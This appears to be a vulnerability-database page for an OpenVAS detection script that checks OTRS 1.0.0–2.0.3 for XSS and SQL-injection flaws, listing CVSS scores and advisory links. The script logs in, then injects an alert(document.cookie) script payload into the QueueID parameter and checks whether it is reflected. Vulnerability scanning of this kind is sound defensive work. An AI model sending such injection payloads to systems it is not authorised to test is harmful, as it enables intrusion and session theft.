Lucene search
Copyright (C) 2013 Greenbone AGOPENVAS:1361412562310803935HistorySep 25, 2013 - 12:00 a.m.
OTRS 1.0.0 - 1.3.2, 2.0.0 - 2.0.3 Multiple Input Validation Vulnerabilities
2013-09-2500:00:00
Copyright (C) 2013 Greenbone AG
plugins.openvas.org
15
6.5 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.009 Low
EPSS
Percentile
82.4%
OTRS (Open Ticket Request System) is prone to multiple input
validation vulnerabilities.
# SPDX-FileCopyrightText: 2013 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:otrs:otrs";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.803935");
script_version("2023-10-27T05:05:28+0000");
script_cve_id("CVE-2005-3893", "CVE-2005-3894", "CVE-2005-3895");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_tag(name:"last_modification", value:"2023-10-27 05:05:28 +0000 (Fri, 27 Oct 2023)");
script_tag(name:"creation_date", value:"2013-09-25 15:32:50 +0530 (Wed, 25 Sep 2013)");
script_name("OTRS 1.0.0 - 1.3.2, 2.0.0 - 2.0.3 Multiple Input Validation Vulnerabilities");
script_tag(name:"impact", value:"Successful exploitation will allow remote attackers to steal the
victim's cookie-based authentication credentials or execute arbitrary SQL commands and bypass
authentication.");
script_tag(name:"vuldetect", value:"Tries to login with provided credentials, sends a crafted HTTP
GET request and checks the response.");
script_tag(name:"insight", value:"Multiple errors exist in the application which fails to validate
below user-supplied input's properly:
- For XSS attack (1) QueueID parameter and (2) Action parameters (3) AttachmentDownloadType.
- For SQL attack (1) user parameter (2) TicketID and (3) ArticleID parameters");
script_tag(name:"solution", value:"Update to version 1.3.3, 2.0.4 or later.");
script_tag(name:"solution_type", value:"VendorFix");
script_tag(name:"summary", value:"OTRS (Open Ticket Request System) is prone to multiple input
validation vulnerabilities.");
script_tag(name:"affected", value:"OTRS (Open Ticket Request System) version 1.0.0 through 1.3.2
and 2.0.0 through 2.0.3.");
script_xref(name:"URL", value:"http://secunia.com/advisories/17685");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/15537");
script_xref(name:"URL", value:"http://xforce.iss.net/xforce/xfdb/34164");
script_xref(name:"URL", value:"http://www.otrs.com/en/open-source/community-news/security-advisories/security-advisory-2005-01/");
script_category(ACT_ATTACK);
script_tag(name:"qod_type", value:"remote_analysis");
script_family("Web application abuses");
script_copyright("Copyright (C) 2013 Greenbone AG");
script_dependencies("logins.nasl", "secpod_otrs_detect.nasl");
script_require_ports("Services/www", 80);
script_mandatory_keys("OTRS/installed", "http/login");
exit(0);
}
include("url_func.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("host_details.inc");
function get_otrs_login_cookie(location, otrsport, otrshost) {
url = location + "/index.pl?";
username = urlencode(str:get_kb_item("http/login"));
password = urlencode(str:get_kb_item("http/password"));
payload = "Action=Login&RequestedURL=&Lang=en&TimeOffset=-330&User=" + username + "&Password=" + password;
req = string("POST ",url," HTTP/1.0\r\n",
"Host: ",otrshost," \r\n",
"Content-Type: application/x-www-form-urlencoded\r\n",
"Referer: http://",otrshost,location,"/index.pl\r\n",
"Connection: keep-alive\r\n",
"Content-Length: ", strlen(payload),"\r\n\r\n",
payload);
buf = http_keepalive_send_recv(port:otrsport, data:req);
if(!buf)
exit(0);
cookie = eregmatch(pattern:"Set-Cookie: Session=([a-z0-9]+)", string:buf);
if(!cookie[1])
exit(0);
return cookie[1];
}
if(!port = get_app_port(cpe:CPE))
exit(0);
if(!loca = get_app_location(cpe:CPE, port:port))
exit(0);
if(loca == "/")
loca = "";
host = http_host_name(port:port);
cookie = get_otrs_login_cookie(location:loca, otrsport:port, otrshost:host);
if(cookie) {
url = loca + '/index.pl?QueueID="><script>alert(document.cookie)</script>"';
req = string("GET ", url, " HTTP/1.1\r\n",
"Host: ", host, " \r\n",
"Connection: keep-alive\r\n",
"Cookie: Session=", cookie, "\r\n\r\n");
res = http_send_recv(port:port, data:req);
if(ereg(pattern:"^HTTP/1\.[01] 200", string:res) &&
"<script>alert(document.cookie)</script>" >< res && "Logout" >< res) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
exit(99);
}
exit(0);
Related
openvas
openvas
Debian Security Advisory DSA 973-1 (otrs)
2008-01-17 00:00:00
Debian: Security Advisory (DSA-973-1)
2008-01-17 00:00:00
osv
osv
otrs - several
2006-02-15 00:00:00
debian
debian
[SECURITY] [DSA 973-1] New OTRS packages fix several vulnerabilities
2006-02-15 07:57:03
[SECURITY] [DSA 973-1] New OTRS packages fix several vulnerabilities
2006-02-15 07:57:03
nessus
nessus
Debian DSA-973-1 : otrs - several vulnerabilities
2006-10-14 00:00:00
cve
cve
ubuntucve
ubuntucve
6.5 Medium
AI Score
Confidence
Low
7.5 High
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.009 Low
EPSS
Percentile
82.4%
Related for OPENVAS:1361412562310803935